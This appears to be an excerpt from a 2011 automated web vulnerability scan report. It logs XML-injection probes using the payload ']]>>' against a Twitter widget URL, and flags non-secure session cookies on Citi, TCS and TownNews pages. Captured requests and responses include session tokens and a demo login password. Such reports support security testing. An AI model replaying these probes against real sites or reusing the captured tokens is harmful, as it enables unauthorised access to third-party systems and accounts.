Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 14:00:14 GMT
Content-Length: 65297
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
l; UNIX- Basic Commands, Understanding and writing Script, FTP, Remote Login etc.
&bull; Constructing queries and to extract data from Multiple tables.
&bull; XML-Understanding and experience on XML Browsing, Fixing and ...</em>
...[SNIP]...

10.8. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1305396256206&count=none&lang=en&text=Intel%20Capital%20Puts%20%2418M%20In%20New%20%26%20Follow-On%20Investments%20%7C%20VCCircle&url=http%3A%2F%2Fwww.vccircle.com%2F500%2Fnews%2Fintel-capital-puts-18m-in-new-follow-on-investments HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sat, 14 May 2011 18:04:21 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/tweet_button.html</Key><RequestId>73949B706B0655FD</Reque
...[SNIP]...

10.9. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1305396256206&count=none&lang=en&text=Intel%20Capital%20Puts%20%2418M%20In%20New%20%26%20Follow-On%20Investments%20%7C%20VCCircle&url=http%3A%2F%2Fwww.vccircle.com%2F500%2Fnews%2Fintel-capital-puts-18m-in-new-follow-on-investments HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sat, 14 May 2011 18:04:23 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]&gt;&gt;</Key><RequestId>94FE412D4002B7C4</Reque
...[SNIP]...

11. SSL cookie without secure flag set

There are 9 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


11.1. https://asia.citi.com/india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://asia.citi.com
Path:   /india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ASPSESSIONIDQCBCQBSS (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm HTTP/1.1
Host: asia.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:12:47 GMT
Server:
Content-Length: 42809
Content-Type: text/html
Cache-control: private
Set-Cookie: ASPSESSIONIDQCBCQBSS=DOOKPDICBCGKMBFPOJIICLNM; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Application for IndianOil Citibank Titanium Credit Card</title>
<meta ht
...[SNIP]...

11.2. https://grs.tcs.com/DTOnline/CareersDesign/Jsps/EntryLevel.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://grs.tcs.com
Path:   /DTOnline/CareersDesign/Jsps/EntryLevel.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DTOnline/CareersDesign/Jsps/EntryLevel.jsp HTTP/1.1
Host: grs.tcs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 14 May 2011 14:13:02 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=BSvHNTNQ1KvH5hJpk201nJqW5HZW7nLKBhDMYcy743zkTBSfnb3n!-1108058746; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<HTML>
<H
...[SNIP]...

11.3. https://townnews365-dot-com.bloxcms.com/users/login/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://townnews365-dot-com.bloxcms.com
Path:   /users/login/

Issue detail

The following cookies were issued by the application and do not have the secure flag set: tncms-services, tncms-authtoken, tncms-screenname and tncms-avatarurl (see the Set-Cookie headers in the response below). One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /users/login/ HTTP/1.1
Host: townnews365-dot-com.bloxcms.com
Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
Content-Length: 130
Cache-Control: max-age=0
Origin: http://www.townnews365.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

referer_url=%2Fuser-generated_solutions%2Fuser_account_contributions%2F%3Flogin_success%3Dtrue&username=Demo+User&password=letmein

Response

HTTP/1.1 302 Found
Server: WWW
Cache-Control: private, no-cache, no-store, max-age=0
X-TNCMS-Memory-Usage: 2944284
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:33:06 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://www.townnews365.com/users/login-success/?referer_url=%2Fuser-generated_solutions%2Fuser_account_contributions%2F%3Flogin_success%3Dtrue&user=6c94bd0e-d884-11de-85c7-001a4bcf887a&cfsv=0.31221200+1305412386
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.056
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: tncms-services=deleted; expires=Fri, 14-May-2010 22:33:05 GMT; path=/
Set-Cookie: tncms-authtoken=AQES8BH8xo3WJMBncGd0zzmJlLbCt1KIAXN3wGZP6DPMgbFe91l6xrWPNXxcv3Xuvh5LX1cTiKiAVWa1Fpr6n70; path=/
Set-Cookie: tncms-screenname=Demo+User; expires=Tue, 13-May-2014 22:33:06 GMT; path=/
Set-Cookie: tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; expires=Tue, 13-May-2014 22:33:06 GMT; path=/
X-Cache-Info: not cacheable; request wasn't a GET or HEAD
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp9
Content-Length: 857

<!DOCTYPE html PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html>
<head>
<base href="https://townnews365-dot-com.bloxcms.com/content/tncms/live/" />

<title>301 Moved Permanently</title>
</head>
<body>
<scr
...[SNIP]...

11.4. https://login.naukri.com/nLogin/Login.php